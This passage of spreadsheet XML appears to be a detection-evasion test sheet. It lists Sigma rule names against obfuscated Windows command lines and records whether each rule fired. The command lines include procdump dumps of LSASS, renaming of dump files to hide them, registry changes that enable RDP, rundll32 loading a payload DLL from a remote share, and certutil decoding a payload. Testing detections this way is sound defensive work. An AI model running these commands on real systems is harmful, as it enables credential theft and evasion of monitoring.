          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E573" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H573" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I573" s="36" t="n"/>
      <c r="J573" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K573" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="574" ht="15.75" customHeight="1" s="42">
      <c r="A574" s="43" t="n"/>
      <c r="B574" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C574" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D574" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E574" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F574" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G574" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H574" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I574" s="43" t="n"/>
      <c r="J574" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K574" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="575" ht="15.75" customHeight="1" s="42">
      <c r="A575" s="43" t="n"/>
      <c r="B575" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C575" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D575" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E575" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F575" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G575" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H575" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I575" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J575" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K575" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="576" ht="15.75" customHeight="1" s="42">
      <c r="A576" s="43" t="n"/>
      <c r="B576" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C576" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D576" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E576" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F576" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G576" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H576" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I576" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J576" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K576" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="577" ht="15.75" customHeight="1" s="42">
      <c r="A577" s="43" t="n"/>
      <c r="B577" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C577" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D577" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E577" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F577" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G577" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H577" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I577" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J577" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K577" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="578" ht="15.75" customHeight="1" s="42">
      <c r="A578" s="43" t="n"/>
      <c r="B578" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C578" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D578" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E578" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F578" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G578" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H578" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I578" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J578" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K578" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="579" ht="15.75" customHeight="1" s="42">
      <c r="A579" s="43" t="n"/>
      <c r="B579" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C579" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D579" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E579" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G579" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H579" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I579" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J579" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K579" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="580" ht="15.75" customHeight="1" s="42">
      <c r="A580" s="43" t="n"/>
      <c r="B580" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C580" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D580" s="43" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E580" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F580" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H580" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I580" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J580" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K580" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="581" ht="15.75" customHeight="1" s="42">
      <c r="A581" s="36" t="n"/>
      <c r="B581" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C581" s="36" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D581" s="36" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E581" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -"m^a" l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H581" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I581" s="43" t="n"/>
      <c r="J581" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K581" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="582" ht="15.75" customHeight="1" s="42">
      <c r="A582" s="36" t="n"/>
      <c r="B582" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C582" s="36" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D582" s="36" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E582" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F582" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G582" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H582" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I582" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J582" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K582" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="583" ht="15.75" customHeight="1" s="42">
      <c r="A583" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B583" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C583" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D583" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E583" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H583" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I583" s="43" t="n"/>
      <c r="J583" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K583" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="584" ht="15.75" customHeight="1" s="42">
      <c r="A584" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B584" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C584" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D584" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E584" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F584" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G584" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H584" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I584" s="43" t="n"/>
      <c r="J584" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K584" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="585" ht="15.75" customHeight="1" s="42">
      <c r="A585" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B585" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C585" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D585" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E585" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F585" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G585" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H585" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I585" s="43" t="n"/>
      <c r="J585" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K585" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="586" ht="15.75" customHeight="1" s="42">
      <c r="A586" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B586" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C586" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D586" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E586" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H586" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I586" s="43" t="n"/>
      <c r="J586" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K586" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="587" ht="15.75" customHeight="1" s="42">
      <c r="A587" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B587" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C587" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D587" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E587" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H587" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I587" s="43" t="n"/>
      <c r="J587" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K587" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="588" ht="15.75" customHeight="1" s="42">
      <c r="A588" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B588" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C588" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D588" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E588" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H588" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I588" s="43" t="n"/>
      <c r="J588" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K588" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="589" ht="15.75" customHeight="1" s="42">
      <c r="A589" s="36" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B589" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C589" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D589" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E589" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F589" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G589" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H589" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I589" s="43" t="n"/>
      <c r="J589" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K589" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="590" ht="15.75" customHeight="1" s="42">
      <c r="A590" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B590" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C590" s="43" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D590" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E590" s="43" t="inlineStr">
        <is>
          <t>echo Y | reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H590" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I590" s="43" t="n"/>
      <c r="J590" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K590" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="591" ht="15.75" customHeight="1" s="42">
      <c r="A591" s="36" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B591" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C591" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D591" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E591" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H591" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I591" s="43" t="n"/>
      <c r="J591" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K591" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="592" ht="15.75" customHeight="1" s="42">
      <c r="A592" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B592" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C592" s="36" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D592" s="36" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E592" s="36" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0/f</t>
        </is>
      </c>
      <c r="F592" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G592" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H592" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I592" s="43" t="n"/>
      <c r="J592" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K592" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="593" ht="15.75" customHeight="1" s="42">
      <c r="A593" s="43" t="n"/>
      <c r="B593" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C593" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D593" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E593" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.100/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F593" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G593" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H593" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I593" s="43" t="n"/>
      <c r="J593" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K593" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="594" ht="15.75" customHeight="1" s="42">
      <c r="A594" s="43" t="n"/>
      <c r="B594" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C594" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D594" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E594" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H594" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I594" s="43" t="n"/>
      <c r="J594" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K594" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="595" ht="15.75" customHeight="1" s="42">
      <c r="A595" s="43" t="n"/>
      <c r="B595" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C595" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D595" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E595" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe /"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H595" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I595" s="43" t="n"/>
      <c r="J595" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K595" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="596" ht="15.75" customHeight="1" s="42">
      <c r="A596" s="43" t="n"/>
      <c r="B596" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C596" s="43" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D596" s="43" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E596" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe -"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F596" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G596" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H596" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I596" s="43" t="n"/>
      <c r="J596" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K596" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="597" ht="15.75" customHeight="1" s="42">
      <c r="A597" s="36" t="n"/>
      <c r="B597" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C597" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D597" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E597" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/SHAre/pAYLOAd.Dll,enTrypoiNT</t>
        </is>
      </c>
      <c r="F597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H597" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I597" s="43" t="n"/>
      <c r="J597" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K597" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="598" ht="15.75" customHeight="1" s="42">
      <c r="A598" s="36" t="n"/>
      <c r="B598" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C598" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D598" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E598" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/shAre/PaylOAD.dLl,EnTRYPOInt</t>
        </is>
      </c>
      <c r="F598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H598" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I598" s="43" t="n"/>
      <c r="J598" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K598" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="599" ht="15.75" customHeight="1" s="42">
      <c r="A599" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B599" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_decode</t>
        </is>
      </c>
      <c r="C599" s="36" t="inlineStr">
        <is>
          <t>File Decoded From Base64/Hex Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D599" s="36" t="inlineStr">
        <is>
          <t>cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7</t>
        </is>
      </c>
      <c r="E599" s="36" t="inlineStr">
        <is>
          <t>certutil.exe "-decode" input.b64 output.exe</t>
        </is>
      </c>
      <c r="F599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H599" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I599" s="43" t="n"/>
      <c r="J599" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K599" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="600" ht="15.75" customHeight="1" s="42">
      <c r="A600" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B600" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_certutil_decode</t>
        </is>
      </c>
      <c r="C600" s="36" t="inlineStr">
        <is>
          <t>File Decoded From Base64/Hex Via Certutil.EXE</t>
        </is>
      </c>
      <c r="D600" s="36" t="inlineStr">
        <is>
